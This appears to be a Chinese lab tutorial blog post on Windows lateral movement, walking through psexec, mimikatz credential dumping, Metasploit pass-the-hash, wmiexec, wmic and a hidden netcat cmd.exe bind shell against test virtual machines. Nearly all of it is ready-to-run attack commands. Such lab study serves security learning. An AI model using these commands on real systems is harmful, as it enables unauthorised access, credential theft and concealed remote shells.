0
点赞
收藏
分享

微信扫一扫

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了

环境:Win10、Win7虚拟机

Windows远程命令执行

1、psexec.exe远程执行命令

psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_拒绝访问

这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Administrator账号才能连接,就算是管理员用户组的其他用户也不能连接,UAC的问题。

2、使用Hash登陆Windows

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_WMI_02

或者使用wce抓取hash值:

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_WMI_03

msf调用payload:

  1.  
    use exploit/windows/smb/psexec
  2.  
    show
  3.  
    set RHOST 192.168.30.128
  4.  
    Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B
  5.  
    set
  6.  
    show
  7.  
    Run

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_Windows_04

3、利用wmiexec工具配合进行反弹半交互shell

cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_安全分析_05

还可以单条命令执行

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_拒绝访问_06

4、WMI执行命令方式,无回显

wmic /node:192.168.30.128 /user:Administrator /password:123456789  process call create "cmd.exe /c ipconfig>c:\result.txt"

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_安全分析_07

执行成功后可以在被控制的机器里面找到执行结果的文件

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_拒绝访问_08

5、nc远程执行

先在被控机器上开启监听,-L:让监听者在连接多次掉线时仍坚持监听,-d:让nc隐藏运行,-e:指定要运行的程序,-p:监听的端口

nc.exe -L -d -e cmd.exe -p 5555

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_安全分析_09

控制端运行nc64.exe 192.168.30.128 5555

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_安全分析_10

 

 

举报
0 条评论